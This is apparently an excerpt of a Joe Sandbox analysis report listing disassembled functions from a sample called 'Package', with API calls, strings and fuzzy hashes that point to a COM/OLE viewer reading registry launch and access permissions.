#567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A1F
#567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A35
#567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A4B
#567.MFC42U(00000087,00000000,00000008,001FD6F2,0000007A,00000008,001FD2DA,00000004), ref: 00200A61

Strings

P , xrefs: 00200A09

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #567$#324H_prolog3
String ID: P
API String ID: 3217428371-3559530664
Opcode ID: b4c7f977831f65bf385a5ad2cf1047a070c5f1fcfcf8fc4673f1ebc379b44f1f
Instruction ID: 202828c8a8edd3df1d15421dfc93c823f4ec9c5895207ef609aaf7f93c9237ce
Opcode Fuzzy Hash: b4c7f977831f65bf385a5ad2cf1047a070c5f1fcfcf8fc4673f1ebc379b44f1f
Instruction Fuzzy Hash: C4110671A1135ADBDB15AFA485013ACFAB4AF44700F61444DE58437282CBB41B95CBD2

Function 001FC962 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001FC969
#324.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC97A
#567.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC991
#567.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC9AB
#540.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC9C2
#540.MFC42U(00000085,00000000,00000008,001FC91A,00000004), ref: 001FC9D1
#861.MFC42U(001F21A0), ref: 001FC9E8

Strings

P , xrefs: 001FC996

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #540#567$#324#861H_prolog3
String ID: P
API String ID: 4024192314-3559530664
Opcode ID: 96446386d3e31ec4002b250a7b5d96bdc42f5a7fd68d59c514a517378447b043
Instruction ID: 0321205410248bdccda46d6ccc510e92a080f5f49871887cde08386acc6b8950
Opcode Fuzzy Hash: 96446386d3e31ec4002b250a7b5d96bdc42f5a7fd68d59c514a517378447b043
Instruction Fuzzy Hash: 09017170A6175BDBDB15EBA086123ADBAB07F54700F504088E654272C3CBB42B559BD2

Function 001FE8E0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0020B8D5: __EH_prolog3.LIBCMT ref: 0020B8DC
Part of subcall function 0020B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 0020B8F4
Part of subcall function 0020B8D5: SetCursor.USER32(00000000), ref: 0020B8FB
Part of subcall function 0020B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 0020B911
Part of subcall function 0020B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 0020B924
Part of subcall function 0020B8D5: SetCursor.USER32(00000000), ref: 0020B92B

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 001FE924

Part of subcall function 0020C0BC: __EH_prolog3_GS.LIBCMT ref: 0020C0C6
Part of subcall function 0020C0BC: #540.MFC42U(00000488,001FC76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0020C0F1
Part of subcall function 0020C0BC: RegOpenKeyExW.ADVAPI32 ref: 0020C112
Part of subcall function 0020C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020C13A
Part of subcall function 0020C0BC: RegCloseKey.ADVAPI32(?), ref: 0020C151
Part of subcall function 0020C0BC: #800.MFC42U ref: 0020C15F

Strings

DefaultLaunchPermission, xrefs: 001FE8F9
DEFAULTLAUNCHPERMISSION, xrefs: 001FE92A
Cannot Launch, xrefs: 001FE8E5
Can Launch, xrefs: 001FE8EA
Global Launch, xrefs: 001FE8EF
SOFTWARE\MICROSOFT\OLE, xrefs: 001FE8FE, 001FE908, 001FE92F
All classes, xrefs: 001FE8F4

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
String ID: All classes$Can Launch$Cannot Launch$DEFAULTLAUNCHPERMISSION$DefaultLaunchPermission$Global Launch$SOFTWARE\MICROSOFT\OLE
API String ID: 1128567903-2386912880
Opcode ID: c64fbcec40c72e9e414520a38ef691a0b76dc245f229b5799b8a81d4ffd4708f
Instruction ID: 27e1062db15a7155fa4817cdefb25e215e774e31396ef7285c08fd0ce6be7da9
Opcode Fuzzy Hash: c64fbcec40c72e9e414520a38ef691a0b76dc245f229b5799b8a81d4ffd4708f
Instruction Fuzzy Hash: 0EE0927238034876D23161665C4BFA76A9DEBC1F12F15041A7328750D2DF90D901C260

Function 001FE6C0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0020B8D5: __EH_prolog3.LIBCMT ref: 0020B8DC
Part of subcall function 0020B8D5: LoadCursorW.USER32(00000000,00007F02), ref: 0020B8F4
Part of subcall function 0020B8D5: SetCursor.USER32(00000000), ref: 0020B8FB
Part of subcall function 0020B8D5: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 0020B911
Part of subcall function 0020B8D5: LoadCursorW.USER32(00000000,00007F00), ref: 0020B924
Part of subcall function 0020B8D5: SetCursor.USER32(00000000), ref: 0020B92B

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 001FE704

Part of subcall function 0020C0BC: __EH_prolog3_GS.LIBCMT ref: 0020C0C6
Part of subcall function 0020C0BC: #540.MFC42U(00000488,001FC76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0020C0F1
Part of subcall function 0020C0BC: RegOpenKeyExW.ADVAPI32 ref: 0020C112
Part of subcall function 0020C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020C13A
Part of subcall function 0020C0BC: RegCloseKey.ADVAPI32(?), ref: 0020C151
Part of subcall function 0020C0BC: #800.MFC42U ref: 0020C15F

Strings

DefaultAccessPermission, xrefs: 001FE6D9
Can Access, xrefs: 001FE6CA
Global Access, xrefs: 001FE6CF
DEFAULTACCESSPERMISSION, xrefs: 001FE70A
Cannot Access, xrefs: 001FE6C5
SOFTWARE\MICROSOFT\OLE, xrefs: 001FE6DE, 001FE6E8, 001FE70F
All classes, xrefs: 001FE6D4

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Cursor$LoadOpen$#540#800CloseH_prolog3H_prolog3_MessageQuerySendValue
String ID: All classes$Can Access$Cannot Access$DEFAULTACCESSPERMISSION$DefaultAccessPermission$Global Access$SOFTWARE\MICROSOFT\OLE
API String ID: 1128567903-1534462617
Opcode ID: ab3b7b196568754362c2769f25d41168c1c01e55c2e4911784bb2a19af4ed34b
Instruction ID: 80c2567929fb164c6b3d35499bf5cd3940d7c481c3529bcfd298aae6dbf8992f
Opcode Fuzzy Hash: ab3b7b196568754362c2769f25d41168c1c01e55c2e4911784bb2a19af4ed34b
Instruction Fuzzy Hash: B6E0D8723C034872D33021625C4BFA36A5DD7C5F52F15011AB728760D2DBA19901C670

Function 001FF540 Relevance: 13.6, APIs: 9, Instructions: 56COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,000000B8,?), ref: 001FF556
#2294.MFC42U(?,000000B1,?,?,000000B8,?), ref: 001FF568
#2294.MFC42U(?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 001FF57A
#2294.MFC42U(?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 001FF58C
#2294.MFC42U(?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?,000000B8,?), ref: 001FF59E
#2362.MFC42U(?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?,000000B1,?,?), ref: 001FF5B0
#2362.MFC42U(?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?,000000B2,?,?), ref: 001FF5C2
#2362.MFC42U(?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?,000000A8,?,?), ref: 001FF5D4
#2362.MFC42U(?,000000A9,?,?,00001FA5,?,?,0000008B,?,?,000000B3,?,?,00000089,?,?), ref: 001FF5E6

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2294$#2362
String ID:
API String ID: 4178481822-0
Opcode ID: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
Instruction ID: c8e5811a1d39b8c9cf745fe7e58167bc8d0ac282475b471e46f43d5202ef3ad6
Opcode Fuzzy Hash: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
Instruction Fuzzy Hash: DE012D72251B157AE615F6609C42FFAF35CAF06700F410622BB18D60C2DBE46A658AE6

Function 6C4E328F Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 6C4E33AE
___TypeMatch.LIBVCRUNTIME ref: 6C4E34BC
_UnwindNestedFrames.LIBCMT ref: 6C4E360E
CallUnexpected.LIBVCRUNTIME ref: 6C4E3629

Strings

csm, xrefs: 6C4E3339
csm, xrefs: 6C4E33E5
csm, xrefs: 6C4E32CC

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 1f2a3d726b71f743112dd34142ea00e812eb75f8fb038c3db6c03f5bd2d20d8f
Instruction ID: f89f14ea8d0da9d6cddc002b045d6b055a87373a76ad8de0bd490ca51a83975f
Opcode Fuzzy Hash: 1f2a3d726b71f743112dd34142ea00e812eb75f8fb038c3db6c03f5bd2d20d8f
Instruction Fuzzy Hash: 6FB15E71800209DFCF16CFA5C840EAEBBB5BF0832AF16459AE8116BB21D731DA55CF91

Function 00206767 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00206789
RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 002067AB
RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 002067E0
wsprintfW.USER32 ref: 00206813
RegCloseKey.ADVAPI32(?), ref: 0020690C
RegCloseKey.ADVAPI32(00000000), ref: 0020691D

Strings

%s <no name>, xrefs: 00206807
409, xrefs: 002067D5

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Close$EnumOpenQueryValuewsprintf
String ID: %s <no name>$409
API String ID: 3624944744-596716345
Opcode ID: dee9cc9735e0e48eacd1a04ce8e3b31af57f9eb53ff597e23a398d6f965d2b61
Instruction ID: 8af67c1993c284919ee3e84c4833ba8b0bbc1c70239afc56caccb138bb6fd701
Opcode Fuzzy Hash: dee9cc9735e0e48eacd1a04ce8e3b31af57f9eb53ff597e23a398d6f965d2b61
Instruction Fuzzy Hash: 0841C870A113299FDB64DF64DC48BA9B7BABB94300F1041E9E509E7291DB729EE4CF10

Function 6C4E82A6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6C4E858B,00000022,FlsSetValue,6C4F0550,6C4F0558,00000000,?,6C4E68CF,FFFFFFFF,000000FF,?,?,6C4E4C74), ref: 6C4E8367

Strings

tLNl, xrefs: 6C4E82A8
api-ms-, xrefs: 6C4E82FD
ext-ms-, xrefs: 6C4E8311

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-$tLNl
API String ID: 3664257935-3874284161
Opcode ID: dd95273c4ceddb892761cbc95ba049c28478bd58b32906d923094d18d1417851
Instruction ID: cdf71854a40f2b846b73b2d2863bf43891fc9a3d0b747c70283150643584591f
Opcode Fuzzy Hash: dd95273c4ceddb892761cbc95ba049c28478bd58b32906d923094d18d1417851
Instruction Fuzzy Hash: 0321EB31A02210AFEF11E769DC40E8A77789B4B367F274512E925E7B81D731ED01C6E0

Function 001FC4B6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001FC4BD
#324.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC4CE
#567.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC4E5
#567.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC500
#567.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC516
#567.MFC42U(00000088,00000000,00000008,001FBFBA,00000004), ref: 001FC52C

Strings

P , xrefs: 001FC4EA

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #567$#324H_prolog3
String ID: P
API String ID: 3217428371-3559530664
Opcode ID: 2ea8086100197bbd73a3c3fc26d06b2d96f2dceceb09fdd4d5968b2b104e3ddb
Instruction ID: 86c14ede45754f264b03484960408375711b457aeb23b7d6520cbec854e2e2dd
Opcode Fuzzy Hash: 2ea8086100197bbd73a3c3fc26d06b2d96f2dceceb09fdd4d5968b2b104e3ddb
Instruction Fuzzy Hash: 89011E71A2135ADBDB159F9489023ACFAB0BF45700F61445EE98437382CBB41B55CBD6

Function 002079B1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(00207AC1,InprocServer32,00000000), ref: 002079C7
RegOpenKeyW.ADVAPI32(00207AC1,InprocHandler32,00000000), ref: 002079DD
RegOpenKeyW.ADVAPI32(00207AC1,LocalServer32,00000000), ref: 002079F3
RegCloseKey.ADVAPI32(00000000,?,?,00207AC1), ref: 00207A00

Strings

InprocHandler32, xrefs: 002079D5
LocalServer32, xrefs: 002079EB
InprocServer32, xrefs: 002079BF

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Open$Close
String ID: InprocHandler32$InprocServer32$LocalServer32
API String ID: 3083169812-2616365248
Opcode ID: de629bcba1b472ef9cacc6eda226c474ef05d59671b9661270a8e1f4df64872e
Instruction ID: 4c125f9d3b72bbb4ba0bdf33a3cb22ad9dc8554592f197e00f9ffe3a258c3030
Opcode Fuzzy Hash: de629bcba1b472ef9cacc6eda226c474ef05d59671b9661270a8e1f4df64872e
Instruction Fuzzy Hash: D4F0D07162820DFBDB15DFB2DD09EEE7ABCEF18785B108425B605D1060DB70EB11EA60

Function 6C4EC012 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 6C4EC0B8
__alloca_probe_16.LIBCMT ref: 6C4EC173
__alloca_probe_16.LIBCMT ref: 6C4EC202
__freea.LIBCMT ref: 6C4EC24D
__freea.LIBCMT ref: 6C4EC253
__freea.LIBCMT ref: 6C4EC289
__freea.LIBCMT ref: 6C4EC28F
__freea.LIBCMT ref: 6C4EC29F

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: bca350030f428b433dcaff3665176a89b3908db72cca0c004b5704d07401b1d9
Instruction ID: c6a76428523f8963ccaf53c812ecd65d047302ab21025e44b38620b2e9caa851
Opcode Fuzzy Hash: bca350030f428b433dcaff3665176a89b3908db72cca0c004b5704d07401b1d9
Instruction Fuzzy Hash: E371F232D452459BEB10EAE48C40FEF7FBA9F4E31BF270159E954A7B80E73588058B91

Function 0020D81B Relevance: 12.1, APIs: 8, Instructions: 78stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0020D19D,?,80000000,00000000), ref: 0020D846
RegCreateKeyExW.ADVAPI32(?,?,00000000,001F21A0,00000000,000F003F,00000000,?,?,?,80000000,00000000), ref: 0020D881
lstrcpyW.KERNEL32(?,0020D19D,?,80000000,00000000), ref: 0020D899
lstrlenW.KERNEL32(80000000,?,80000000,00000000), ref: 0020D8A0
lstrlenW.KERNEL32(?,?,80000000,00000000), ref: 0020D8B1
RegSetValueExW.ADVAPI32(?,80000000,00000000,00000001,?,00000000,?,80000000,00000000), ref: 0020D8EA
RegCloseKey.ADVAPI32(?,?,80000000,00000000), ref: 0020D8FC

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: lstrlen$CloseCreateValuelstrcpy
String ID:
API String ID: 2938206059-0
Opcode ID: dfefbed7c9e593f10abd72d7987b0daf12b92722e0f904ef8d1f0305b80f37df
Instruction ID: d14fb6aede623ee16a8234aa1c3507fafb98bc93fa45ac467852c15dff514cbc
Opcode Fuzzy Hash: dfefbed7c9e593f10abd72d7987b0daf12b92722e0f904ef8d1f0305b80f37df
Instruction Fuzzy Hash: 71212DB560121DEBDB10EFA5ED4CBEA77BCAB58300F0085A5F619D3152DA709A548F60

Function 002020C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 223windowCOMMON

Download Yara Rule

APIs

GetMessagePos.USER32 ref: 0020210B

Part of subcall function 002091B7: ScreenToClient.USER32(?,?), ref: 002091C2

#3909.MFC42U(?,?,?,?,?,?), ref: 0020218B

Part of subcall function 002091E9: SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002091FB

Part of subcall function 002078FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 0020790C

#6266.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00202479
#2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00202484
#2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 0020248F

Strings

TypeLib, xrefs: 0020229D

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Message$#2430Send$#3909#6266ClientScreen
String ID: TypeLib
API String ID: 852555880-4260498707
Opcode ID: 1dd7bbed253604ff1bde751c1e26bebf0dae0c01be212fb6c59a3425c2048acd
Instruction ID: ea142136e05f350c85f733dbb6e967c39320baf563cefeac1020cbc02d122c45
Opcode Fuzzy Hash: 1dd7bbed253604ff1bde751c1e26bebf0dae0c01be212fb6c59a3425c2048acd
Instruction Fuzzy Hash: B7A11731960329EBDB24EF54CC8EBECB7B5AB14301F5041EAA109661E2CBB45ED8CF11

Function 6C4E117D Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6C4E11C4
___scrt_uninitialize_crt.LIBCMT ref: 6C4E11DE

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: ebf363f3ae9565e0bfd85e19758f007d5d06d011544b28b086d63845c2905c73
Instruction ID: ae4791d8245f71f3b942cad03829823d3db61894e5043233d80636d5109becd8
Opcode Fuzzy Hash: ebf363f3ae9565e0bfd85e19758f007d5d06d011544b28b086d63845c2905c73
Instruction Fuzzy Hash: 1241D672E85254AADB10DF65CC40FEE36B5EB8D7ABF124119E820A7B42D730C945CBD0

Function 0020DB5F Relevance: 10.6, APIs: 7, Instructions: 121COMMON

Download Yara Rule

APIs

isspace.MSVCRT ref: 0020DB7C
isdigit.MSVCRT ref: 0020DBCD
toupper.MSVCRT ref: 0020DBE3
isxdigit.MSVCRT ref: 0020DBF6
isdigit.MSVCRT ref: 0020DC1A
isspace.MSVCRT ref: 0020DC2E
isspace.MSVCRT ref: 0020DC49

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: isspace$isdigit$isxdigittoupper
String ID:
API String ID: 4280169866-0
Opcode ID: 591fdee761c4e36beab2d2802af77641872293136e3a1d46fd6a7059b1991ce5
Instruction ID: c3c4d6f0a3019f247ed192a04d8657281877c12d503a3a0d72c347a57e3fe4d0
Opcode Fuzzy Hash: 591fdee761c4e36beab2d2802af77641872293136e3a1d46fd6a7059b1991ce5
Instruction Fuzzy Hash: E831B1B2922222C7DB241FA9EC4457277E8EF65775326452BFC85C72C1EBB4CC90D660

Function 6C4E1C50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6C4E1C87
___except_validate_context_record.LIBVCRUNTIME ref: 6C4E1C8F
_ValidateLocalCookies.LIBCMT ref: 6C4E1D18
__IsNonwritableInCurrentImage.LIBCMT ref: 6C4E1D43
_ValidateLocalCookies.LIBCMT ref: 6C4E1D98

Strings

csm, xrefs: 6C4E1D2D

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b71481b009d53c931e1dbb9ec87f238aa7b2be07aa2a1feaba931178938e6824
Instruction ID: 89554b80c97db8e1424326c21a7541b23cc6427bd9c2d4e54fdd94c861208f9c
Opcode Fuzzy Hash: b71481b009d53c931e1dbb9ec87f238aa7b2be07aa2a1feaba931178938e6824
Instruction Fuzzy Hash: 4641B634A402099FCF10CF68C884EDEBBB4BF4D31AF128559D824AB752D731EA15CB90

Function 001FED46 Relevance: 10.5, APIs: 7, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001FED50
#498.MFC42U(00000090), ref: 001FED5A

